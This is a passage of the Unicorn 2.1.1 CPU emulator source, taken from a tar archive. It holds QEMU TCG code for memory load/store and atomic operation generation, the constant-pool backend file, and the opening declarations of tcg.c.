epilogue to quit immediately. void check_exit_request(TCGContext *tcg_ctx) { TCGv_i32 count; // Unicorn: // For ARM IT block, we couldn't exit in the middle of the // block and this is the our hack here. if (tcg_ctx->uc->no_exit_request) { return; } count = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, count, tcg_ctx->cpu_env, offsetof(ArchCPU, neg.icount_decr.u32) - offsetof(ArchCPU, env)); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, count, 0, tcg_ctx->exitreq_label); tcg_temp_free_i32(tcg_ctx, count); } static void tcg_gen_req_mo(TCGContext *tcg_ctx, TCGBar type) { #ifdef TCG_GUEST_DEFAULT_MO type &= TCG_GUEST_DEFAULT_MO; #endif type &= ~TCG_TARGET_DEFAULT_MO; if (type) { tcg_gen_mb(tcg_ctx, type | TCG_BAR_SC); } } void tcg_gen_qemu_ld_i32(TCGContext *tcg_ctx, TCGv_i32 val, TCGv addr, TCGArg idx, MemOp memop) { MemOp orig_memop; tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_LD | TCG_MO_ST_LD); memop = tcg_canonicalize_memop(memop, 0, 0); orig_memop = memop; if (!TCG_TARGET_HAS_MEMORY_BSWAP && (memop & MO_BSWAP)) { memop &= ~MO_BSWAP; /* The bswap primitive requires zero-extended input. */ if ((memop & MO_SSIZE) == MO_SW) { memop &= ~MO_SIGN; } } gen_ldst_i32(tcg_ctx, INDEX_op_qemu_ld_i32, val, addr, memop, idx); if ((orig_memop ^ memop) & MO_BSWAP) { switch (orig_memop & MO_SIZE) { case MO_16: tcg_gen_bswap16_i32(tcg_ctx, val, val); if (orig_memop & MO_SIGN) { tcg_gen_ext16s_i32(tcg_ctx, val, val); } break; case MO_32: tcg_gen_bswap32_i32(tcg_ctx, val, val); break; default: g_assert_not_reached(); } } check_exit_request(tcg_ctx); } void tcg_gen_qemu_st_i32(TCGContext *tcg_ctx, TCGv_i32 val, TCGv addr, TCGArg idx, MemOp memop) { TCGv_i32 swap = NULL; tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_ST | TCG_MO_ST_ST); memop = tcg_canonicalize_memop(memop, 0, 1); #if !TCG_TARGET_HAS_MEMORY_BSWAP if (memop & MO_BSWAP) { swap = tcg_temp_new_i32(tcg_ctx); switch (memop & MO_SIZE) { case MO_16: tcg_gen_ext16u_i32(tcg_ctx, swap, val); tcg_gen_bswap16_i32(tcg_ctx, swap, swap); break; case MO_32: tcg_gen_bswap32_i32(tcg_ctx, swap, val); break; default: g_assert_not_reached(); } val = swap; memop &= ~MO_BSWAP; } #endif gen_ldst_i32(tcg_ctx, INDEX_op_qemu_st_i32, val, addr, memop, idx); if (swap) { tcg_temp_free_i32(tcg_ctx, swap); } check_exit_request(tcg_ctx); } void tcg_gen_qemu_ld_i64(TCGContext *tcg_ctx, TCGv_i64 val, TCGv addr, TCGArg idx, MemOp memop) { MemOp orig_memop; #if TCG_TARGET_REG_BITS == 32 if ((memop & MO_SIZE) < MO_64) { tcg_gen_qemu_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, val), addr, idx, memop); if (memop & MO_SIGN) { tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, val), TCGV_LOW(tcg_ctx, val), 31); } else { tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, val), 0); } check_exit_request(tcg_ctx); return; } #endif tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_LD | TCG_MO_ST_LD); memop = tcg_canonicalize_memop(memop, 1, 0); orig_memop = memop; #if !TCG_TARGET_HAS_MEMORY_BSWAP if (memop & MO_BSWAP) { memop &= ~MO_BSWAP; /* The bswap primitive requires zero-extended input. */ if ((memop & MO_SIGN) && (memop & MO_SIZE) < MO_64) { memop &= ~MO_SIGN; } } #endif gen_ldst_i64(tcg_ctx, INDEX_op_qemu_ld_i64, val, addr, memop, idx); if ((orig_memop ^ memop) & MO_BSWAP) { switch (orig_memop & MO_SIZE) { case MO_16: tcg_gen_bswap16_i64(tcg_ctx, val, val); if (orig_memop & MO_SIGN) { tcg_gen_ext16s_i64(tcg_ctx, val, val); } break; case MO_32: tcg_gen_bswap32_i64(tcg_ctx, val, val); if (orig_memop & MO_SIGN) { tcg_gen_ext32s_i64(tcg_ctx, val, val); } break; case MO_64: tcg_gen_bswap64_i64(tcg_ctx, val, val); break; default: g_assert_not_reached(); } } check_exit_request(tcg_ctx); } void tcg_gen_qemu_st_i64(TCGContext *tcg_ctx, TCGv_i64 val, TCGv addr, TCGArg idx, MemOp memop) { TCGv_i64 swap = NULL; #if TCG_TARGET_REG_BITS == 32 if ((memop & MO_SIZE) < MO_64) { tcg_gen_qemu_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, val), addr, idx, memop); check_exit_request(tcg_ctx); return; } #endif tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_ST | TCG_MO_ST_ST); memop = tcg_canonicalize_memop(memop, 1, 1); #if !TCG_TARGET_HAS_MEMORY_BSWAP if (memop & MO_BSWAP) { swap = tcg_temp_new_i64(tcg_ctx); switch (memop & MO_SIZE) { case MO_16: tcg_gen_ext16u_i64(tcg_ctx, swap, val); tcg_gen_bswap16_i64(tcg_ctx, swap, swap); break; case MO_32: tcg_gen_ext32u_i64(tcg_ctx, swap, val); tcg_gen_bswap32_i64(tcg_ctx, swap, swap); break; case MO_64: tcg_gen_bswap64_i64(tcg_ctx, swap, val); break; default: g_assert_not_reached(); } val = swap; memop &= ~MO_BSWAP; } #endif gen_ldst_i64(tcg_ctx, INDEX_op_qemu_st_i64, val, addr, memop, idx); if (swap) { tcg_temp_free_i64(tcg_ctx, swap); } check_exit_request(tcg_ctx); } static void tcg_gen_ext_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 val, MemOp opc) { switch (opc & MO_SSIZE) { case MO_SB: tcg_gen_ext8s_i32(tcg_ctx, ret, val); break; case MO_UB: tcg_gen_ext8u_i32(tcg_ctx, ret, val); break; case MO_SW: tcg_gen_ext16s_i32(tcg_ctx, ret, val); break; case MO_UW: tcg_gen_ext16u_i32(tcg_ctx, ret, val); break; default: tcg_gen_mov_i32(tcg_ctx, ret, val); break; } } static void tcg_gen_ext_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 val, MemOp opc) { switch (opc & MO_SSIZE) { case MO_SB: tcg_gen_ext8s_i64(tcg_ctx, ret, val); break; case MO_UB: tcg_gen_ext8u_i64(tcg_ctx, ret, val); break; case MO_SW: tcg_gen_ext16s_i64(tcg_ctx, ret, val); break; case MO_UW: tcg_gen_ext16u_i64(tcg_ctx, ret, val); break; case MO_SL: tcg_gen_ext32s_i64(tcg_ctx, ret, val); break; case MO_UL: tcg_gen_ext32u_i64(tcg_ctx, ret, val); break; default: tcg_gen_mov_i64(tcg_ctx, ret, val); break; } } typedef void (*gen_atomic_cx_i32)(TCGContext *tcg_ctx, TCGv_i32, TCGv_env, TCGv, TCGv_i32, TCGv_i32, TCGv_i32); typedef void (*gen_atomic_cx_i64)(TCGContext *tcg_ctx, TCGv_i64, TCGv_env, TCGv, TCGv_i64, TCGv_i64, TCGv_i32); typedef void (*gen_atomic_op_i32)(TCGContext *tcg_ctx, TCGv_i32, TCGv_env, TCGv, TCGv_i32, TCGv_i32); typedef void (*gen_atomic_op_i64)(TCGContext *tcg_ctx, TCGv_i64, TCGv_env, TCGv, TCGv_i64, TCGv_i32); #ifdef CONFIG_ATOMIC64 # define WITH_ATOMIC64(X) X, #else # define WITH_ATOMIC64(X) #endif static void * const table_cmpxchg[16] = { [MO_8] = gen_helper_atomic_cmpxchgb, [MO_16 | MO_LE] = gen_helper_atomic_cmpxchgw_le, [MO_16 | MO_BE] = gen_helper_atomic_cmpxchgw_be, [MO_32 | MO_LE] = gen_helper_atomic_cmpxchgl_le, [MO_32 | MO_BE] = gen_helper_atomic_cmpxchgl_be, WITH_ATOMIC64([MO_64 | MO_LE] = gen_helper_atomic_cmpxchgq_le) WITH_ATOMIC64([MO_64 | MO_BE] = gen_helper_atomic_cmpxchgq_be) }; void tcg_gen_atomic_cmpxchg_i32(TCGContext *tcg_ctx, TCGv_i32 retv, TCGv addr, TCGv_i32 cmpv, TCGv_i32 newv, TCGArg idx, MemOp memop) { memop = tcg_canonicalize_memop(memop, 0, 0); if (!(tcg_ctx->tb_cflags & CF_PARALLEL)) { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext_i32(tcg_ctx, t2, cmpv, memop & MO_SIZE); tcg_gen_qemu_ld_i32(tcg_ctx, t1, addr, idx, memop & ~MO_SIGN); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, t2, t1, t2, newv, t1); tcg_gen_qemu_st_i32(tcg_ctx, t2, addr, idx, memop); tcg_temp_free_i32(tcg_ctx, t2); if (memop & MO_SIGN) { tcg_gen_ext_i32(tcg_ctx, retv, t1, memop); } else { tcg_gen_mov_i32(tcg_ctx, retv, t1); } tcg_temp_free_i32(tcg_ctx, t1); } else { gen_atomic_cx_i32 gen; gen = table_cmpxchg[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop & ~MO_SIGN, idx)); gen(tcg_ctx, retv, tcg_ctx->cpu_env, addr, cmpv, newv, oi); tcg_temp_free_i32(tcg_ctx, oi); } if (memop & MO_SIGN) { tcg_gen_ext_i32(tcg_ctx, retv, retv, memop); } } } void tcg_gen_atomic_cmpxchg_i64(TCGContext *tcg_ctx, TCGv_i64 retv, TCGv addr, TCGv_i64 cmpv, TCGv_i64 newv, TCGArg idx, MemOp memop) { memop = tcg_canonicalize_memop(memop, 1, 0); if (!(tcg_ctx->tb_cflags & CF_PARALLEL)) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i64(tcg_ctx, t2, cmpv, memop & MO_SIZE); tcg_gen_qemu_ld_i64(tcg_ctx, t1, addr, idx, memop & ~MO_SIGN); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t2, t1, t2, newv, t1); tcg_gen_qemu_st_i64(tcg_ctx, t2, addr, idx, memop); tcg_temp_free_i64(tcg_ctx, t2); if (memop & MO_SIGN) { tcg_gen_ext_i64(tcg_ctx, retv, t1, memop); } else { tcg_gen_mov_i64(tcg_ctx, retv, t1); } tcg_temp_free_i64(tcg_ctx, t1); } else if ((memop & MO_SIZE) == MO_64) { #ifdef CONFIG_ATOMIC64 gen_atomic_cx_i64 gen; gen = table_cmpxchg[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop, idx)); gen(tcg_ctx, retv, tcg_ctx->cpu_env, addr, cmpv, newv, oi); tcg_temp_free_i32(tcg_ctx, oi); } #else gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); /* Produce a result, so that we have a well-formed opcode stream with respect to uses of the result in the (dead) code following. */ tcg_gen_movi_i64(tcg_ctx, retv, 0); #endif /* CONFIG_ATOMIC64 */ } else { TCGv_i32 c32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 n32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 r32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c32, cmpv); tcg_gen_extrl_i64_i32(tcg_ctx, n32, newv); tcg_gen_atomic_cmpxchg_i32(tcg_ctx, r32, addr, c32, n32, idx, memop & ~MO_SIGN); tcg_temp_free_i32(tcg_ctx, c32); tcg_temp_free_i32(tcg_ctx, n32); tcg_gen_extu_i32_i64(tcg_ctx, retv, r32); tcg_temp_free_i32(tcg_ctx, r32); if (memop & MO_SIGN) { tcg_gen_ext_i64(tcg_ctx, retv, retv, memop); } } } static void do_nonatomic_op_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv addr, TCGv_i32 val, TCGArg idx, MemOp memop, bool new_val, void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); memop = tcg_canonicalize_memop(memop, 0, 0); tcg_gen_qemu_ld_i32(tcg_ctx, t1, addr, idx, memop); tcg_gen_ext_i32(tcg_ctx, t2, val, memop); gen(tcg_ctx, t2, t1, t2); tcg_gen_qemu_st_i32(tcg_ctx, t2, addr, idx, memop); tcg_gen_ext_i32(tcg_ctx, ret, (new_val ? t2 : t1), memop); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } static void do_atomic_op_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv addr, TCGv_i32 val, TCGArg idx, MemOp memop, void * const table[]) { gen_atomic_op_i32 gen; memop = tcg_canonicalize_memop(memop, 0, 0); gen = table[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop & ~MO_SIGN, idx)); gen(tcg_ctx, ret, tcg_ctx->cpu_env, addr, val, oi); tcg_temp_free_i32(tcg_ctx, oi); } if (memop & MO_SIGN) { tcg_gen_ext_i32(tcg_ctx, ret, ret, memop); } } static void do_nonatomic_op_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, TCGv_i64 val, TCGArg idx, MemOp memop, bool new_val, void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); memop = tcg_canonicalize_memop(memop, 1, 0); tcg_gen_qemu_ld_i64(tcg_ctx, t1, addr, idx, memop); tcg_gen_ext_i64(tcg_ctx, t2, val, memop); gen(tcg_ctx, t2, t1, t2); tcg_gen_qemu_st_i64(tcg_ctx, t2, addr, idx, memop); tcg_gen_ext_i64(tcg_ctx, ret, (new_val ? t2 : t1), memop); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static void do_atomic_op_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, TCGv_i64 val, TCGArg idx, MemOp memop, void * const table[]) { memop = tcg_canonicalize_memop(memop, 1, 0); if ((memop & MO_SIZE) == MO_64) { #ifdef CONFIG_ATOMIC64 gen_atomic_op_i64 gen; gen = table[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop & ~MO_SIGN, idx)); gen(tcg_ctx, ret, tcg_ctx->cpu_env, addr, val, oi); tcg_temp_free_i32(tcg_ctx, oi); } #else gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); /* Produce a result, so that we have a well-formed opcode stream with respect to uses of the result in the (dead) code following. */ tcg_gen_movi_i64(tcg_ctx, ret, 0); #endif /* CONFIG_ATOMIC64 */ } else { TCGv_i32 v32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 r32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, v32, val); do_atomic_op_i32(tcg_ctx, r32, addr, v32, idx, memop & ~MO_SIGN, table); tcg_temp_free_i32(tcg_ctx, v32); tcg_gen_extu_i32_i64(tcg_ctx, ret, r32); tcg_temp_free_i32(tcg_ctx, r32); if (memop & MO_SIGN) { tcg_gen_ext_i64(tcg_ctx, ret, ret, memop); } } } #define GEN_ATOMIC_HELPER(NAME, OP, NEW) \ static void * const table_##NAME[16] = { \ [MO_8] = gen_helper_atomic_##NAME##b, \ [MO_16 | MO_LE] = gen_helper_atomic_##NAME##w_le, \ [MO_16 | MO_BE] = gen_helper_atomic_##NAME##w_be, \ [MO_32 | MO_LE] = gen_helper_atomic_##NAME##l_le, \ [MO_32 | MO_BE] = gen_helper_atomic_##NAME##l_be, \ WITH_ATOMIC64([MO_64 | MO_LE] = gen_helper_atomic_##NAME##q_le) \ WITH_ATOMIC64([MO_64 | MO_BE] = gen_helper_atomic_##NAME##q_be) \ }; \ void tcg_gen_atomic_##NAME##_i32 \ (TCGContext *tcg_ctx, TCGv_i32 ret, TCGv addr, TCGv_i32 val, TCGArg idx, MemOp memop) \ { \ if (tcg_ctx->tb_cflags & CF_PARALLEL) { \ do_atomic_op_i32(tcg_ctx, ret, addr, val, idx, memop, table_##NAME); \ } else { \ do_nonatomic_op_i32(tcg_ctx, ret, addr, val, idx, memop, NEW, \ tcg_gen_##OP##_i32); \ } \ } \ void tcg_gen_atomic_##NAME##_i64 \ (TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, TCGv_i64 val, TCGArg idx, MemOp memop) \ { \ if (tcg_ctx->tb_cflags & CF_PARALLEL) { \ do_atomic_op_i64(tcg_ctx, ret, addr, val, idx, memop, table_##NAME); \ } else { \ do_nonatomic_op_i64(tcg_ctx, ret, addr, val, idx, memop, NEW, \ tcg_gen_##OP##_i64); \ } \ } GEN_ATOMIC_HELPER(fetch_add, add, 0) GEN_ATOMIC_HELPER(fetch_and, and, 0) GEN_ATOMIC_HELPER(fetch_or, or, 0) GEN_ATOMIC_HELPER(fetch_xor, xor, 0) GEN_ATOMIC_HELPER(fetch_smin, smin, 0) GEN_ATOMIC_HELPER(fetch_umin, umin, 0) GEN_ATOMIC_HELPER(fetch_smax, smax, 0) GEN_ATOMIC_HELPER(fetch_umax, umax, 0) GEN_ATOMIC_HELPER(add_fetch, add, 1) GEN_ATOMIC_HELPER(and_fetch, and, 1) GEN_ATOMIC_HELPER(or_fetch, or, 1) GEN_ATOMIC_HELPER(xor_fetch, xor, 1) GEN_ATOMIC_HELPER(smin_fetch, smin, 1) GEN_ATOMIC_HELPER(umin_fetch, umin, 1) GEN_ATOMIC_HELPER(smax_fetch, smax, 1) GEN_ATOMIC_HELPER(umax_fetch, umax, 1) static void tcg_gen_mov2_i32(TCGContext *tcg_ctx, TCGv_i32 r, TCGv_i32 a, TCGv_i32 b) { tcg_gen_mov_i32(tcg_ctx, r, b); } static void tcg_gen_mov2_i64(TCGContext *tcg_ctx, TCGv_i64 r, TCGv_i64 a, TCGv_i64 b) { tcg_gen_mov_i64(tcg_ctx, r, b); } GEN_ATOMIC_HELPER(xchg, mov2, 0) #undef GEN_ATOMIC_HELPER �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/tcg-pool.inc.c���������������������������������������������������������������0000664�0000000�0000000�00000012341�14675241067�0017371�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TCG Backend Data: constant pool. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ typedef struct TCGLabelPoolData { struct TCGLabelPoolData *next; tcg_insn_unit *label; intptr_t addend; int rtype; unsigned nlong; tcg_target_ulong data[]; } TCGLabelPoolData; static TCGLabelPoolData *new_pool_alloc(TCGContext *s, int nlong, int rtype, tcg_insn_unit *label, intptr_t addend) { TCGLabelPoolData *n = tcg_malloc(s, sizeof(TCGLabelPoolData) + sizeof(tcg_target_ulong) * nlong); n->label = label; n->addend = addend; n->rtype = rtype; n->nlong = nlong; return n; } static void new_pool_insert(TCGContext *s, TCGLabelPoolData *n) { TCGLabelPoolData *i, **pp; int nlong = n->nlong; /* Insertion sort on the pool. */ for (pp = &s->pool_labels; (i = *pp) != NULL; pp = &i->next) { if (nlong > i->nlong) { break; } if (nlong < i->nlong) { continue; } if (memcmp(n->data, i->data, sizeof(tcg_target_ulong) * nlong) >= 0) { break; } } n->next = *pp; *pp = n; } /* The "usual" for generic integer code. */ static inline void new_pool_label(TCGContext *s, tcg_target_ulong d, int rtype, tcg_insn_unit *label, intptr_t addend) { TCGLabelPoolData *n = new_pool_alloc(s, 1, rtype, label, addend); n->data[0] = d; new_pool_insert(s, n); } /* For v64 or v128, depending on the host. */ static inline void new_pool_l2(TCGContext *s, int rtype, tcg_insn_unit *label, intptr_t addend, tcg_target_ulong d0, tcg_target_ulong d1) { TCGLabelPoolData *n = new_pool_alloc(s, 2, rtype, label, addend); n->data[0] = d0; n->data[1] = d1; new_pool_insert(s, n); } /* For v128 or v256, depending on the host. */ static inline void new_pool_l4(TCGContext *s, int rtype, tcg_insn_unit *label, intptr_t addend, tcg_target_ulong d0, tcg_target_ulong d1, tcg_target_ulong d2, tcg_target_ulong d3) { TCGLabelPoolData *n = new_pool_alloc(s, 4, rtype, label, addend); n->data[0] = d0; n->data[1] = d1; n->data[2] = d2; n->data[3] = d3; new_pool_insert(s, n); } /* For v256, for 32-bit host. */ static inline void new_pool_l8(TCGContext *s, int rtype, tcg_insn_unit *label, intptr_t addend, tcg_target_ulong d0, tcg_target_ulong d1, tcg_target_ulong d2, tcg_target_ulong d3, tcg_target_ulong d4, tcg_target_ulong d5, tcg_target_ulong d6, tcg_target_ulong d7) { TCGLabelPoolData *n = new_pool_alloc(s, 8, rtype, label, addend); n->data[0] = d0; n->data[1] = d1; n->data[2] = d2; n->data[3] = d3; n->data[4] = d4; n->data[5] = d5; n->data[6] = d6; n->data[7] = d7; new_pool_insert(s, n); } /* To be provided by cpu/tcg-target.inc.c. */ static void tcg_out_nop_fill(tcg_insn_unit *p, int count); static int tcg_out_pool_finalize(TCGContext *s) { TCGLabelPoolData *p = s->pool_labels; TCGLabelPoolData *l = NULL; char *a; if (p == NULL) { return 0; } /* ??? Round up to qemu_icache_linesize, but then do not round again when allocating the next TranslationBlock structure. */ a = (void *)ROUND_UP((uintptr_t)s->code_ptr, sizeof(tcg_target_ulong) * p->nlong); tcg_out_nop_fill(s->code_ptr, (tcg_insn_unit *)a - s->code_ptr); s->data_gen_ptr = a; for (; p != NULL; p = p->next) { size_t size = sizeof(tcg_target_ulong) * p->nlong; if (!l || l->nlong != p->nlong || memcmp(l->data, p->data, size)) { if (unlikely(a > (char *)s->code_gen_highwater)) { return -1; } memcpy(a, p->data, size); a += size; l = p; } if (!patch_reloc(p->label, p->rtype, (intptr_t)a - size, p->addend)) { return -2; } } s->code_ptr = (tcg_insn_unit *)a; return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/tcg.c������������������������������������������������������������������������0000664�0000000�0000000�00000401441�14675241067�0015655�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /* define it to use liveness analysis (better code) */ #define USE_TCG_OPTIMIZATIONS #include "qemu/osdep.h" /* Define to jump the ELF file used to communicate with GDB. */ #undef DEBUG_JIT #include "qemu/cutils.h" #include "qemu/host-utils.h" #include "qemu/timer.h" #include <glib_compat.h> /* Note: the long term plan is to reduce the dependencies on the QEMU CPU definitions. Currently they are used for qemu_ld/st instructions */ #define NO_CPU_IO_DEFS #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #if UINTPTR_MAX == UINT32_MAX # define ELF_CLASS ELFCLASS32 #else # define ELF_CLASS ELFCLASS64 #endif #ifdef HOST_WORDS_BIGENDIAN # define ELF_DATA ELFDATA2MSB #else # define ELF_DATA ELFDATA2LSB #endif #include "elf.h" #include "sysemu/sysemu.h" #include <uc_priv.h> /* Forward declarations for functions declared in tcg-target.inc.c and used here. */ static void tcg_target_init(TCGContext *s); static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode); static void tcg_target_qemu_prologue(TCGContext *s); static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend); /* The CIE and FDE header definitions will be common to all hosts. */ typedef struct { // uint32_t len __attribute__((aligned((sizeof(void *))))); uint32_t QEMU_ALIGN(8, len); uint32_t id; uint8_t version; char augmentation[1]; uint8_t code_align; uint8_t data_align; uint8_t return_column; } DebugFrameCIE; QEMU_PACK(typedef struct { // uint32_t len __attribute__((aligned((sizeof(void *))))); uint32_t QEMU_ALIGN(8, len); uint32_t cie_offset; uintptr_t func_start; uintptr_t func_len; }) DebugFrameFDEHeader; QEMU_PACK(typedef struct { DebugFrameCIE cie; DebugFrameFDEHeader fde; }) DebugFrameHeader; static QEMU_UNUSED_FUNC void tcg_register_jit_int(TCGContext *s, void *buf, size_t size, const void *debug_frame, size_t debug_frame_size); /* Forward declarations for functions declared and used in tcg-target.inc.c. */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type); static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg1, intptr_t arg2); static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg); static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg); static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args); #if TCG_TARGET_MAYBE_vec static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg src); static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg base, intptr_t offset); static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg dst, tcg_target_long arg); static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args); #else static inline bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg src) { g_assert_not_reached(); } static inline bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg base, intptr_t offset) { g_assert_not_reached(); } static inline void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg dst, tcg_target_long arg) { g_assert_not_reached(); } static inline void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { g_assert_not_reached(); } #endif static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2); static bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs); static void tcg_out_call(TCGContext *s, tcg_insn_unit *target); static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct); #ifdef TCG_TARGET_NEED_LDST_LABELS static int tcg_out_ldst_finalize(TCGContext *s); #endif #define TCG_HIGHWATER 1024 #if TCG_TARGET_INSN_UNIT_SIZE == 1 static QEMU_UNUSED_FUNC inline void tcg_out8(TCGContext *s, uint8_t v) { *s->code_ptr++ = v; } static QEMU_UNUSED_FUNC inline void tcg_patch8(tcg_insn_unit *p, uint8_t v) { *p = v; } #endif #if TCG_TARGET_INSN_UNIT_SIZE <= 2 static QEMU_UNUSED_FUNC inline void tcg_out16(TCGContext *s, uint16_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 2) { *s->code_ptr++ = v; } else { tcg_insn_unit *p = s->code_ptr; memcpy(p, &v, sizeof(v)); s->code_ptr = p + (2 / TCG_TARGET_INSN_UNIT_SIZE); } } static QEMU_UNUSED_FUNC inline void tcg_patch16(tcg_insn_unit *p, uint16_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 2) { *p = v; } else { memcpy(p, &v, sizeof(v)); } } #endif #if TCG_TARGET_INSN_UNIT_SIZE <= 4 static QEMU_UNUSED_FUNC inline void tcg_out32(TCGContext *s, uint32_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 4) { *s->code_ptr++ = v; } else { tcg_insn_unit *p = s->code_ptr; memcpy(p, &v, sizeof(v)); s->code_ptr = p + (4 / 